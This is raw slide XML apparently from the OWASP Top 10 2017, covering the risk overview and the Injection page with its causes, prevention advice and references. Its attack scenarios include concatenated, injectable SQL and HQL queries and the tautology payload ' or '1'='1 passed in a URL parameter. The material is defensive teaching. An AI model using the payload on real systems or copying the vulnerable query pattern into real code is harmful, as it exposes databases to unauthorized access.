        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E895283-6404-4647-9AED-A7928C930CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="6731648"/>
            <a:ext cx="5218177" cy="51259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Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks. </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4" name="Freeform 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="6636962"/>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A8:2017-Insecure Deserialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="7495636"/>
            <a:ext cx="5218177" cy="611796"/>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Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Freeform 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591F4221-9110-4B57-9D5B-633059706604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="7435423"/>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A9:2017-Using Components with Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="8298617"/>
            <a:ext cx="5218177" cy="611796"/>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Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring. </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8" name="Freeform 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD39F83D-88CC-4839-86E9-886E3E768699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75185" y="8240115"/>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A10:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Insufficient </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Logging &amp; Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA334A99-A6CF-4DF0-BB88-4F315BF4201A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66368" y="5158509"/>
            <a:ext cx="1443106" cy="647625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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A6:2017-Security Misconfiguration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705852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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: An application uses untrusted data in the construction of the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL call:</a:t>
            </a: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String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:b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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</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("id") +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endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)):</a:t>
            </a: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Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HQLQuery</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session.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("FROM accounts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>custID</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("id") +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en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In both cases, the attacker modifies the ‘id’ parameter value in their browser to send: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. For example: </a:t>
            </a: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http://example.com/app/accountView?id=</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or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1</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1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify or delete data, or even invoke stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An application is vulnerable to attack when:</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User-supplied data is not validated, filtered, or sanitized by the application.</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Hostile data is used directly with dynamic queries or non-parameterized calls for the interpreter without context-aware escaping.</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Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records.</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Hostile data is directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1270" indent="-1270">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Some of the more common injections are SQL, NoSQL, OS command, Object Relational Mapping (ORM), LDAP, and Expression Language (EL) or Object Graph Navigation Library (OGNL) injection. The concept is identical among all interpreters. Source code review is the best method of detecting if applications are vulnerable to injections, closely followed by thorough automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs. Organizations can include static source (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) and dynamic application test (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) tools into the CI/CD pipeline to identify newly introduced injection flaws prior to production deployment. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="6372000"/>
            <a:ext cx="3383280" cy="275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u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>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Proactive Controls: Parameterize Queries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ASVS: V5 Input Validation and Encoding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Testing Guide: SQL Injection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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>ORM 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Cheat Sheet: Injection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OWASP Cheat Sheet: SQL Injection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4"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Injection Prevention in Java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5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: Query Parameterization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6"/>
              </a:rPr>
              <a:t>OWASP Automated Threats to Web Applications – OAT-014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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7"/>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18"/>
              </a:rPr>
              <a:t>CWE-77: Command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>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19"/>
              </a:rPr>
              <a:t>CWE-89: SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>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20"/>
              </a:rPr>
              <a:t>CWE-564: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>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21"/>
              </a:rPr>
              <a:t>CWE-917: Expression Language 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22"/>
              </a:rPr>
              <a:t>PortS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId23"/>
              </a:rPr>
              <a:t>wigger: Server-side template injection</a:t>
            </a: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Preventing injection requires keeping data separate from commands and queries.</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preferred option is to use a safe API, which avoids the use of the interpreter entirely or provides a parameterized interface, or migrate to use Object Relational Mapping Tools (ORMs). </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Even when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> parameterized, stored procedures can still introduce SQL injection if PL/SQL or T-SQL concatenates queries and data, or executes hostile data with EXECUTE IMMEDIATE or exec().</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Use positive or "whitelist" server-side input validation. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is not a complete defense as many applications require special characters, such as text areas or APIs for mobile applications.</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For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: SQL structure such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report-writing software.</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Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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A1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="459229983"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836272" cy="2101908"/>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472">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7508">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rgbClr val="FFFFFF"/>
                          </a:solidFill>
